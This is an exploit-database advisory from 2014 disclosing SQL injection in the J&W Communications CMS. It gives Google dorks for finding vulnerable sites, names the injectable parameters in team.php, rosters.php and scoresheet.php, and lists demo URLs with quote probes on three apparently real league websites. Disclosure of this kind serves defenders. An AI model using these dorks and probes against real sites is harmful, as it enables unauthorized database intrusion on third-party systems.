J&W Communications SQL Injection

2014.07.30
Credit: Hekt0r
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:\"designed by J&W Communications\"

[+] Title: J&W Communications Cms SQL Injection Vulnerability [+] Date: 2014-07-29 [+] Author: Hekt0r [+] Vendor Homepage: www.jw-com.com [+] Tested on: Windows7 & Kali Linux [+] Vulnerable Files: /rosters.php /team.php /scoresheet.php [+} Dork : intext:"designed by J&W Communications" inurl:/team.php.php?id= inurl:/rosters.php?id= inurl:/scoresheet.php?sched_id= ### POC: http://site/team.php.php?id=[SQL-Injection] http://site/rosters.php?id=[SQL-Injection] http://site/scoresheet.php?sched_id=[SQL-Injection] ### Demo: http://www.ambhXl.ab.ca/team.php?id=132%27 http://edmbantamtoXurney.com/rosters.php?id=19%27 http://www.pwXnhl.ca/scoresheet.php?sched_id=44%27 ### Credits: [+] Special Thanks: Root SmasheR, Mr.Moein, UmPire, Ali Ahmady, Saeed.Jok3r M4hdi, Black Hacker, Vahid Her, BlackErroR, Phantom.S3c And All members of Iran Security Group [+] iransec.net


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top